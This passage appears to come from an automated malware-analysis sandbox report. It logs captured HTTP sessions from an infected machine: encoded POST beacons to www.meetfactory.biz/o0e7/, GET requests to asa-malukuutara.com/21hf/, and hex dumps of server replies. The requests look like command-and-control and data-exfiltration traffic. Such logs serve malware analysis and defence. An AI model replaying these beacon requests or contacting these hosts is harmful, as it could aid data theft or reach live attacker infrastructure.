                                                Aug 27, 2024 08:03:19.346015930 CEST3867OUTData Raw: 72 70 49 64 71 4f 63 5a 67 47 57 34 78 43 32 71 4a 37 42 64 74 54 58 58 56 63 69 4e 50 4c 73 33 51 49 4f 65 6c 47 47 37 6d 48 65 54 73 46 58 33 39 4c 70 49 67 6f 75 36 74 7a 68 39 2f 72 45 71 44 62 4d 49 35 4f 35 6d 64 6c 77 48 6d 34 6a 70 55 73
                                                Data Ascii: rpIdqOcZgGW4xC2qJ7BdtTXXVciNPLs3QIOelGG7mHeTsFX39LpIgou6tzh9/rEqDbMI5O5mdlwHm4jpUs0Dy9lbrtR1hgC0ktqWJH/t6F5x5qVbeDdL3Y1Wqdjn3hkxFNmV7N4A+O3c5KpTBlnHtoqfS8V0QJjbGcYYXtwdGh6bhnEgqlx5NQKBq5gxlsbjcnEPOdWQrfDCNmq0na92wBR7z4WcOJveovtsuc95h5noDTBhImP
                                                Aug 27, 2024 08:03:19.694839001 CEST2578OUTData Raw: 7a 39 53 44 75 39 6e 79 71 71 61 45 47 6a 73 43 57 2f 2f 71 66 36 32 6e 50 66 4c 4b 6c 34 63 68 4c 42 68 6c 73 64 76 48 34 54 73 75 50 31 32 64 4a 47 4e 66 6d 70 61 46 69 34 72 48 49 56 4e 46 47 4c 6b 46 46 70 37 37 57 42 4d 41 7a 34 76 4e 44 47
                                                Data Ascii: z9SDu9nyqqaEGjsCW//qf62nPfLKl4chLBhlsdvH4TsuP12dJGNfmpaFi4rHIVNFGLkFFp77WBMAz4vNDG4GGfS+ivTfLnfqyaGP2b1R8ZwhBDtuozp5iA9nJRTjrTOPsn5DlD3Y6zGIXV6SPesODbQOt5E0iI8kO3D0mHcWKxds/P1cIryFdwJ/U4h3ptV++Dv4ICygMX/Z9BYQjJs4BYIfZRY5ANafVOCjYHi1yCdb5jB7f0+
                                                Aug 27, 2024 08:03:19.695019960 CEST9023OUTData Raw: 54 42 73 31 4a 6f 5a 78 64 7a 2b 51 41 50 77 55 32 66 36 44 78 5a 48 64 32 61 7a 6b 44 71 6e 56 37 43 76 4b 35 33 76 63 65 77 4e 68 57 78 49 6c 6d 34 73 38 6e 56 6c 42 76 71 68 63 38 44 2f 74 45 71 56 36 6c 67 58 6b 38 32 4a 4c 32 78 6e 76 39 35
                                                Data Ascii: TBs1JoZxdz+QAPwU2f6DxZHd2azkDqnV7CvK53vcewNhWxIlm4s8nVlBvqhc8D/tEqV6lgXk82JL2xnv95zd1pATpoJcOHS+yVRkN246awEcyEjPDdzPlmIG5hAPqvn4auNQSiCExk1si03cufNXPXOJG0uADgQSDFDoX69qQRrn/t5Fff8JIZIMgXOMgndpT/P+7V+giJzXB5wL0kE8FbARpIF3BVNP0xN8qhIf3n1kRuTkvgj
                                                Aug 27, 2024 08:03:19.695128918 CEST3300OUTData Raw: 48 34 68 6c 59 38 45 6b 6b 5a 6a 69 73 5a 42 4e 54 6b 58 54 6b 46 43 4c 63 4c 6f 58 67 7a 43 72 4b 72 63 7a 58 53 6b 35 67 50 2b 58 6d 39 4f 57 37 50 51 6f 62 68 6b 32 51 62 4d 63 35 72 6c 41 36 33 75 4d 6e 33 5a 70 6e 47 70 46 59 42 73 56 34 6e
                                                Data Ascii: H4hlY8EkkZjisZBNTkXTkFCLcLoXgzCrKrczXSk5gP+Xm9OW7PQobhk2QbMc5rlA63uMn3ZpnGpFYBsV4nirAyQTbhleawdAISx2yXtva/+2A2BbBzT888t6yueTLSQjOx37LVoJyqq8GKwXbEmNhIWbG8lqyf4wICZriPpWB/AX1vJDekTda6vN0pyHoT4IqWInyo9ogBmwwL5/Bw508p6sRhpKB/PdIKd4sHZfgNIJt7hw2ss
                                                Aug 27, 2024 08:03:20.251723051 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:03:19 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 53 06 02 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 61 0a 67 16 08 65 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 24 79 b6 24 d9 e7 94 2c f7 1e 19 7a 8f 64 e8 e6 f7 ee 83 ff 0b c5 06 99 b8 7b c1 f6 10 60 16 2c 62 92 6c 12 d7 70 79 7a 61 80 c2 89 37 a2 20 4a f6 31 4c 6b b7 bf cf ba eb 12 44 44 45 40 4d da 7b 89 cb 63 f3 9a 60 a9 46 79 31 91 a9 e1 8c 0d fd 41 ec 93 bc 55 22 99 ef ab 0c d5 66 f7 42 62 1b 43 c9 29 20 75 5b c6 d4 b2 d9 bd ee 17 39 09 57 03 44 62 5d 94 80 c1 d5 9c 6b c0 a4 8b 57 48 77 f4 c7 e3 1c 07 73 4f 8b 42 bc 6f ac 50 ce cb b5 c4 73 59 58 0a 88 1c da 0d 45 5d 15 f5 10 81 04 53 06 57 2a 81 4b 7f 8b 17 05 60 a3 5b 7c 4c 2c 0e ea b2 1b 8c 41 3a 24 34 2e 92 1a 2f 02 53 92 81 83 db a0 eb 3d 70 2c 82 e2 fb c7 13 a2 84 bb c7 3b fa e5 ee f3 8f ef fb 3c 7b 49 f3 0f ad e9 5e c1 ea b6 5a 34 9d 43 7a 19 5b ed eb fd 62 b7 0d 2f 3d 0c 95 53 f4 a0 da e3 eb [TRUNCATED]
                                                Data Ascii: SAI?TM||}grz+ "Cw^\LoK"9dage^=$y$,zd{`,blpyza7 J1LkDDE@M{c`Fy1AU"fBbC) u[9WDb]kWHwsOBoPsYXE]SW*K`[|L,A:$4./S=p,;<{I^Z4Cz[b/=SUS<(2i\!o);nb@.b~#D "fynmn)t<u4&{i)D<"aEOa&/|AQ"v8Giv~mo2j8Oyv)|q1tJW~JYr^h'q0)r}om8%0O{]{$m|yWh"O-?O{U;^-/i<N+x*}';)*Z$vu:`w}'%/|$Uof;R^l?*LlBj*5TM*?Ow?qX+Q2mEO&cFOy:TeK[Cko.r%+6[ZMtAmMo(KM9&A-]\w-"\ftS\4N
                                                Aug 27, 2024 08:03:20.251852989 CEST1289INData Raw: b4 fa 6e 9b 21 3c 61 29 88 9c bf fb 16 2a c6 88 ad d0 ac 3f d0 b5 6a 0d ba aa c4 fc cd fb 2d fc ab b7 af da ea 22 53 1f eb 7e d0 37 37 aa 43 0a cf 71 71 e1 ae 06 8b 7e 29 d3 a3 5f b7 db e6 3f be 2f ac 51 a0 72 5d 96 48 38 2e 8c a2 90 a0 d2 3c 05
                                                Data Ascii: n!<a)*?j-"S~77Cqq~)_?/Qr]H8.<a*[^n|"nVo-%u}+I_&t|? Wsp;kT8'z"t8y|UZ|K+M<kVS9F`_QqZ
                                                Aug 27, 2024 08:03:20.251940966 CEST1289INData Raw: 2c 40 4a 57 cf 03 75 e0 af 74 09 15 aa 70 f7 f9 74 de 2a e7 a9 24 d0 35 12 dd af 4d 31 22 dc d6 56 44 7b 53 b2 02 ee bd f6 c1 e2 8b 10 6c 19 b1 34 8f 4f 39 e3 d1 b2 4d 58 1a 45 f4 f0 59 40 30 29 52 5c 98 a5 70 7a 6d f7 39 e3 f1 49 b0 2c ca fe 10
                                                Data Ascii: ,@JWutpt*$5M1"VD{Sl4O9MXEY@0)R\pzm9I,m2.=2hmbO7:ekX,K/K9|WcE,x"9A^So'9/?S~r}O+]-J""!dCwt%kwBvJo.cp*=1i


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                57192.168.11.2049899103.247.8.5380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:21.877654076 CEST553OUTGET /21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:22.332128048 CEST518INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 06:03:22 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Location: http://asa-malukuutara.com/21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb
                                                Vary: Accept-Encoding
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                58192.168.11.204990096.126.123.24480
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:35.633765936 CEST823OUTPOST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4d 67 4c 56 53 62 4e 55 74 42 64 75 63 59 56 55 51 64 49 78 42 51 42 6b 6c 55 49 78 54 36 64 66 63 34 52 30 6b 69 4c 33 67 6b 52 4f 6f 4c 64 74 71 57 6c 55 6f 77 78 43 35 49 38 46 6c 41 4f 71 41 5a 75 37 53 32 37 52 58 49 46 65 66 6e 37 42 71 47 4c 48 4b 56 4b 62 6f 30 4c 7a 33 59 41 74 68 36 56 72 63 70 55 61 6d 70 33 35 37 41 79 45 38 53 64 48 42 64 6f 4f 79 69 39 36 54 74 73 6c 51 68 49 67 77 30 68 2f 31 4e 56 35 61 68 4f 6b 7a 54 70 35 44 77 75 5a 6c 43 79 36 74 6f 74 6a 6a 56 61 62 6f 46 53 6e 6c 6d 77 71 51 4c 33 61 66 75 79 4d 6b 67 3d 3d
                                                Data Ascii: ij60MtY=8FGBhUcVYFkEMgLVSbNUtBducYVUQdIxBQBklUIxT6dfc4R0kiL3gkROoLdtqWlUowxC5I8FlAOqAZu7S27RXIFefn7BqGLHKVKbo0Lz3YAth6VrcpUamp357AyE8SdHBdoOyi96TtslQhIgw0h/1NV5ahOkzTp5DwuZlCy6totjjVaboFSnlmwqQL3afuyMkg==
                                                Aug 27, 2024 08:03:35.768976927 CEST804INHTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 06:03:35 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                content-encoding: gzip
                                                connection: close
                                                Data Raw: 32 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 53 4d 73 9b 30 10 bd f7 57 50 0e 99 76 a6 e6 c3 c4 c6 6e 20 9d d4 8d 89 09 b1 93 d4 09 36 97 8c 90 14 4b 0e 48 14 04 98 74 fa df 0b b8 13 d3 71 2f d5 01 69 97 dd b7 fb de 4a d6 fb 6f 8b c9 72 7d 7b 29 11 11 47 e7 ef ac 66 93 22 c0 36 b6 8c 99 7c fe 4e aa 97 45 30 40 fb 63 6b c6 58 00 09 12 90 66 58 d8 f2 c3 72 da 1b fd 89 3c fc 26 42 24 3d fc 23 a7 85 2d ef 7a 39 e8 41 1e 27 40 d0 30 c2 b2 04 39 13 98 d5 b9 b3 4b 1b a3 0d 3e ca 66 20 c6 b6 5c 50 5c 26 3c 15 9d 84 92 22 41 6c 84 0b 0a 71 af 35 3e 49 94 51 41 41 d4 cb 20 88 b0 ad 2b 5a 17 4e 50 11 e1 73 4b dd ef 2d 9d b6 49 c6 33 98 d2 44 1c 68 fd bb f7 14 3f a7 38 23 9d 16 b4 b3 3c 8d ec 86 df 67 55 2d cb d2 d4 94 18 63 f1 0c a0 e0 69 a5 84 f4 55 95 25 f5 80 6b a9 c7 b5 ac 56 c2 ae 46 c7 75 06 ff 51 c7 52 0f 23 b2 42 8e 2a 89 b3 88 03 64 cb 88 3f ed 8f 1f 3e 76 65 d9 93 97 44 95 d4 3a 0b bc 13 ea 16 14 60 ef ed c4 35 9a 3c e7 0c 0a ca 99 d4 81 92 7e be 29 d9 84 34 ab a4 0c f1 52 11 3c 51 22 0e eb 49 73 [TRUNCATED]
                                                Data Ascii: 264SMs0WPvn 6KHtq/iJor}{)Gf"6|NE0@ckXfXr<&B$=#-z9A'@09K>f \P\&<"Alq5>IQAA +ZNPsK-I3Dh?8#<gU-ciU%kVFuQR#B*d?>veD:`5<~)4R<Q"IsdKA#/OYslhMP3.N@l\:_^P?*%W.l8Zqr#H}b=VkM07U'<Wwm<#G<gZBgS3H6';fDEH_p$?Hd:MxqE8y>N+4qL>g^cz,{-&W)-0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                59192.168.11.204990196.126.123.24480
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:38.305671930 CEST1163OUTPOST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4e 42 37 56 52 34 56 55 71 68 64 74 54 34 56 55 5a 39 49 39 42 51 4e 6b 6c 56 4e 38 54 73 31 66 64 63 56 30 6c 6a 4c 33 74 45 52 4f 67 72 64 6f 75 57 6b 35 6f 77 39 38 35 49 41 46 6c 41 79 71 53 63 69 37 54 47 37 51 64 6f 46 52 59 6e 37 4d 38 32 4c 64 4b 55 33 77 6f 31 76 7a 33 75 30 74 69 38 35 72 62 34 55 5a 68 4a 33 33 76 77 79 48 33 79 64 4a 42 64 73 73 79 6a 56 41 53 66 77 6c 54 46 30 67 68 45 68 38 2f 39 56 30 56 42 50 54 79 7a 63 4e 61 6a 71 36 73 78 61 48 72 4a 52 44 2b 45 4b 67 70 48 6d 65 39 6e 4d 30 52 2f 47 78 4b 39 7a 64 36 66 37 31 36 72 54 4b 66 61 76 75 54 56 55 32 32 38 62 59 53 4d 6f 6c 38 39 62 63 43 52 77 38 70 74 51 4a 49 33 34 69 37 65 6d 6f 65 74 74 33 33 58 53 76 46 6d 5a 32 75 45 38 4a 7a 6d 2f 33 4c 31 55 64 4b 36 46 33 4d 48 37 74 51 4e 72 67 42 71 4c 67 47 46 72 4e 47 56 58 78 32 74 6f 39 73 2b 4c 73 77 75 4a 71 50 6f 56 32 42 39 67 67 63 49 50 5a 64 56 34 66 53 37 34 79 70 56 65 69 4d 7a 33 75 2f 50 6c 6b 4b 43 [TRUNCATED]
                                                Data Ascii: ij60MtY=8FGBhUcVYFkENB7VR4VUqhdtT4VUZ9I9BQNklVN8Ts1fdcV0ljL3tEROgrdouWk5ow985IAFlAyqSci7TG7QdoFRYn7M82LdKU3wo1vz3u0ti85rb4UZhJ33vwyH3ydJBdssyjVASfwlTF0ghEh8/9V0VBPTyzcNajq6sxaHrJRD+EKgpHme9nM0R/GxK9zd6f716rTKfavuTVU228bYSMol89bcCRw8ptQJI34i7emoett33XSvFmZ2uE8Jzm/3L1UdK6F3MH7tQNrgBqLgGFrNGVXx2to9s+LswuJqPoV2B9ggcIPZdV4fS74ypVeiMz3u/PlkKC+a4Xr4M7LU91pkjjUb0OK+rS/edroqXmilg6KDA0Mq1gTcRCkWT9NOTenqEsjoR2aYnp8qQid7PP5YhGvOWa98WdNpmB031qSB3LtYELnQBaMjPFJnSPD5laY5lYNSx6W7fPbdqro7vf17DWZuJ5VZ/f+DI9XGANxW2AiTkpPuTq5VQhRXqsVE8LdT9TPHKY/7rQYFcwJ8zWI=
                                                Aug 27, 2024 08:03:38.441900969 CEST804INHTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 06:03:38 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                content-encoding: gzip
                                                connection: close
                                                Data Raw: 32 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 e6 33 0e 76 03 e9 a4 6e 4c 4c 88 9d a4 4e b0 7d c9 08 49 b1 e4 80 44 40 80 49 a7 ff bd 80 3b 31 1d f7 52 1d 90 76 d9 7d bb ef ad 64 7f f8 3e 1b cd 97 b7 97 12 11 71 74 7e 64 37 9b 14 01 b6 76 64 cc e4 f3 23 a9 5e 36 c1 00 ed 8e ad 19 63 01 24 48 40 9a 61 e1 c8 0f f3 71 6f f0 27 72 ff 9b 08 91 f4 f0 6b 4e 0b 47 de f6 72 d0 83 3c 4e 80 a0 61 84 65 09 72 26 30 ab 73 27 97 0e 46 6b 7c 90 cd 40 8c 1d b9 a0 b8 4c 78 2a 3a 09 25 45 82 38 08 17 14 e2 5e 6b 7c 96 28 a3 82 82 a8 97 41 10 61 47 57 b4 2e 9c a0 22 c2 e7 b6 ba db 5b 3a 6d 93 8c 67 30 a5 89 d8 d3 fa 77 ef 29 7e 4e 71 46 3a 2d 68 67 79 1a 39 0d bf 2f aa 5a 96 a5 a5 29 31 c6 e2 19 40 c1 d3 4a 09 e9 9b 2a 4b ea 1e d7 56 0f 6b d9 ad 84 5d 8d 0e eb f4 ff a3 8e ad ee 47 64 87 1c 55 12 67 11 07 c8 91 11 7f da 1d 3f 7e ea ca b2 23 2f 89 2a a9 75 16 78 2b d4 0d 28 c0 ce db 89 6b 34 79 ce 19 14 94 33 a9 03 25 fd 7c 57 b2 09 69 56 49 19 e2 a5 22 78 a2 44 1c d6 93 e6 4c [TRUNCATED]
                                                Data Ascii: 264SMs0WPv3vnLLN}ID@I;1Rv}d>qt~d7vd#^6c$H@aqo'rkNGr<Naer&0s'Fk|@Lx*:%E8^k|(AaGW."[:mg0w)~NqF:-hgy9/Z)1@J*KVk]GdUg?~#/*ux+(k4y3%|WiVI"xDL!5+XRq[_o9eXT(fj64\>t9t1(WsH].<d4im?A<Djq/^aq>~5x4k zdi5s$$"m`J!AiVP 61[?Flo(_wb Br7wV7VkR?x}b0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                60192.168.11.204990296.126.123.24480
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:03:40.983166933 CEST2578OUTPOST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4e 42 37 56 52 34 56 55 71 68 64 74 54 34 56 55 5a 39 49 39 42 51 4e 6b 6c 56 4e 38 54 73 39 66 64 70 42 30 6b 41 7a 33 73 45 52 4f 75 4c 64 70 75 57 6c 37 6f 78 56 77 35 49 4e 77 6c 46 32 71 53 72 6d 37 55 30 6a 51 59 6f 46 63 57 48 37 43 71 47 4b 45 4b 56 4b 70 6f 78 2f 4e 33 63 55 74 68 2b 52 72 63 4c 38 61 72 35 33 35 76 77 79 4c 7a 79 63 6a 42 64 67 38 79 6a 5a 41 53 63 55 6c 52 33 4d 67 78 46 68 38 32 4e 56 31 63 68 50 6d 39 54 64 31 61 6a 2b 75 73 78 61 39 72 49 56 44 2b 48 79 67 6f 47 6d 5a 36 48 4d 30 5a 66 47 79 62 74 2f 5a 36 66 6e 54 36 75 76 4b 66 62 4c 75 53 31 55 32 38 39 62 62 51 73 6f 6a 34 39 62 74 47 52 4d 6b 70 70 34 64 49 7a 6f 69 37 4f 79 6f 63 63 74 33 6b 32 53 76 4d 6d 5a 77 67 6b 38 61 6c 57 2f 72 4c 31 45 42 4b 37 6c 6e 4d 48 50 74 51 74 4c 67 4b 6f 76 6e 57 31 71 47 4e 31 57 72 67 64 30 4c 73 2b 37 67 77 75 4a 36 50 71 6c 32 43 4e 51 67 62 4d 54 57 51 6c 34 59 47 4c 35 79 6e 31 53 34 4d 77 44 6d 2f 50 39 30 4b 44 [TRUNCATED]
                                                Data Ascii: ij60MtY=8FGBhUcVYFkENB7VR4VUqhdtT4VUZ9I9BQNklVN8Ts9fdpB0kAz3sEROuLdpuWl7oxVw5INwlF2qSrm7U0jQYoFcWH7CqGKEKVKpox/N3cUth+RrcL8ar535vwyLzycjBdg8yjZAScUlR3MgxFh82NV1chPm9Td1aj+usxa9rIVD+HygoGmZ6HM0ZfGybt/Z6fnT6uvKfbLuS1U289bbQsoj49btGRMkpp4dIzoi7Oyocct3k2SvMmZwgk8alW/rL1EBK7lnMHPtQtLgKovnW1qGN1Wrgd0Ls+7gwuJ6Pql2CNQgbMTWQl4YGL5yn1S4MwDm/P90KDqaqHr4IYjXvlpntzUJ6uKprS6/dokQXyaljuqDFkMrxATYYikQENNOTerUEsnoRHiYo5sqbSh7JP5ehGvbWahxWdFXmCt/1oeB3adYBKnTK6M6LFJwPfO/laELlYcnxNm7eLHduro45v14AWZ8N5YA/fy5I9TWAOxWznXx7Y73IZNFdhp6uNIW25Vpsy/WGeDA0hcxFxpWuCMhv3eQHjsokQXttdlqCmcbbix1Wzc1zUdVQ3bzgROnsCjC9ax8OHWC2eLitogRdl7T4GT6fcKl9XuVQOiGwHfZ3Od2c8Eug0lZdfv+GyNWdKm32Onfn3s1zw+0KVRfL6p+Y4uOzhCOwTN135cry/SkCGmJe3vJVgYDs4uBGF8SPP1Q6d6VXeCd0cyWOfSLvN83VPDWGRtEpMAzVK+xW+cre8UTiD8nBkl/k9Rsd3V87j37Z1djhZrU8/FKGPv1b+BnxABiwFtrjH5zdopaZLr+wsmFiiGOoTYwcpi2Ag5LA1cCZlTQzoFqFaaXZ48rEr6kDXa6bAUQW6o+hjSlEStYJd8wpyGKZe5rbPmoldPPg+Vk2h+AZGfiRhti2nMsMkExmwEwVkCChg42p/iE8GvGJZ1ER1qYoZRJx1btJtA2qavkaqwP1695RteoT6lbSIEbOjYv9hzxxYgtQyjWUqdo [TRUNCATED]
                                                Aug 27, 2024 08:03:40.983187914 CEST3867OUTData Raw: 37 6b 7a 6b 35 75 44 35 55 52 52 63 34 4c 6f 4b 36 75 6b 37 4b 33 37 30 42 4d 46 56 4c 35 53 34 72 49 61 6f 79 42 4e 55 34 6c 43 51 78 51 6a 62 78 4e 4f 77 32 4e 71 47 53 64 48 39 65 4b 37 64 44 45 31 6a 43 32 57 69 59 75 4a 57 6d 39 35 79 54 79
                                                Data Ascii: 7kzk5uD5URRc4LoK6uk7K370BMFVL5S4rIaoyBNU4lCQxQjbxNOw2NqGSdH9eK7dDE1jC2WiYuJWm95yTyQ1cBeDLVJ/zhMWK1edFupElzT6xuWnxDeosT6xHTXUvwqEVVOFtuw7CRXpHFlaDciOYwuhWcHx+5Xeyz+G7SMZlepnSlchCRz1xhQqcx/FgUojzIt944zX7MYNAGj4J0TV0jsUd5kmZ5zC14KYPT+IzFVZUUYjAdu
                                                Aug 27, 2024 08:03:40.983236074 CEST6445OUTData Raw: 39 46 30 69 76 59 79 66 63 6a 67 42 6a 31 4a 4f 57 38 66 32 4b 77 56 69 51 6e 41 42 6a 4c 31 44 49 68 72 69 61 63 52 30 35 56 35 68 4c 75 70 74 59 39 36 54 49 45 68 63 2f 57 67 35 63 77 6a 4b 63 48 57 5a 62 62 51 51 4f 2f 4e 43 59 56 51 6a 2f 75
                                                Data Ascii: 9F0ivYyfcjgBj1JOW8f2KwViQnABjL1DIhriacR05V5hLuptY96TIEhc/Wg5cwjKcHWZbbQQO/NCYVQj/uj4I7UhtvLrMkFTPltEWRU03CxW47JDBpzYjyyL71wH2Mr2yqxO3CkmHKlB3wC7buwSFe8BE9pU0c6PJRCgvYpHj20m855BuNzRMcT9UMv6rsAyVUQsorGHt22arNurQUds6QSKZZPPD9iQR2CJevvW2fThCzHm3CY
                                                Aug 27, 2024 08:03:41.115881920 CEST1289OUTData Raw: 75 6a 71 73 75 4c 5a 52 4e 56 2b 43 6f 4f 72 65 6b 33 45 46 6f 41 6d 7a 50 46 51 32 38 4e 44 6c 6d 4b 39 6e 47 50 2f 72 53 64 70 38 63 49 47 38 34 31 6d 76 4e 31 59 78 68 63 57 76 79 59 76 2f 6f 38 73 2f 55 62 4d 66 50 67 7a 33 63 31 72 75 4c 73
                                                Data Ascii: ujqsuLZRNV+CoOrek3EFoAmzPFQ28NDlmK9nGP/rSdp8cIG841mvN1YxhcWvyYv/o8s/UbMfPgz3c1ruLsUGeNTOu0sH9KinEFYdr23FWCPPTnKrJrRxiuq6OB1T8oZhNBQyOkD1X09UDJsYmRYKe/0hXASdbtQl0jGgPl/1xu030dusHdAkqm0Q8PWGRozPEJESEqNkpdKZUXOhxio9pCksWXF8TJQN7UslQFFUpbi0G7JRwvL
                                                Aug 27, 2024 08:03:41.116055012 CEST11601OUTData Raw: 48 2b 38 33 56 37 30 4e 4e 54 49 53 65 63 64 6b 36 31 4a 46 65 67 4d 62 4d 4f 48 2f 47 64 57 73 58 44 48 46 50 4b 57 46 4e 42 48 47 50 52 58 53 50 65 71 2b 56 61 76 75 55 76 62 34 4b 33 53 74 43 54 78 45 33 30 42 41 33 6c 4d 34 59 59 34 42 4c 6c
                                                Data Ascii: H+83V70NNTISecdk61JFegMbMOH/GdWsXDHFPKWFNBHGPRXSPeq+VavuUvb4K3StCTxE30BA3lM4YY4BLl32zZFpYzbqYGdJa2kAHA9LV1CRPT5p0BcUsZge3eMhvqN3zsW9ODdJ6YfJ3raH061AHilZRdDnTKbSbWHLTPHKEOZ4XYmCy3o5y2otntMgabunHqndceLiWSQMnobNniRCrIXMjesBL8KrN2VcOnKAirqv5aIV2AQ
                                                Aug 27, 2024 08:03:41.116224051 CEST7734OUTData Raw: 4a 54 79 6d 6b 65 58 64 6e 48 34 62 54 4e 4e 54 4e 47 52 6a 43 4c 41 6b 30 52 50 67 4e 52 35 6a 4c 59 38 46 41 64 4d 72 56 71 45 69 53 30 73 31 69 76 4d 56 4a 41 6e 41 4b 32 2f 55 6f 53 4d 4c 34 58 35 47 67 4e 4e 67 64 6c 67 54 5a 54 38 43 56 4d
                                                Data Ascii: JTymkeXdnH4bTNNTNGRjCLAk0RPgNR5jLY8FAdMrVqEiS0s1ivMVJAnAK2/UoSML4X5GgNNgdlgTZT8CVM1063+ch13AoBpSHOp7L77w9RP066RaStCZ0nGN2oVm1cED+ADKJBR/8rpEOeQv5ZBtkdRskJF9VfGK3ejXzWdfTpNNT8uunV43g+DxsMDofjMqFcGDz+KQZXRf+orwTOLUoF+VZ2cs35pHIx+1B0tpe2RWKepVC43
                                                Aug 27, 2024 08:03:41.116429090 CEST5156OUTData Raw: 63 61 79 61 71 48 45 77 69 7a 47 4d 33 46 34 41 32 6d 36 33 61 48 66 41 66 33 63 46 38 64 61 5a 6f 50 71 51 74 35 73 33 4a 58 76 54 6f 6d 4b 34 6d 58 6f 6d 67 7a 4c 6d 31 44 71 74 5a 30 78 64 56 69 2b 6b 54 78 76 76 48 57 72 65 72 35 2f 69 4a 74
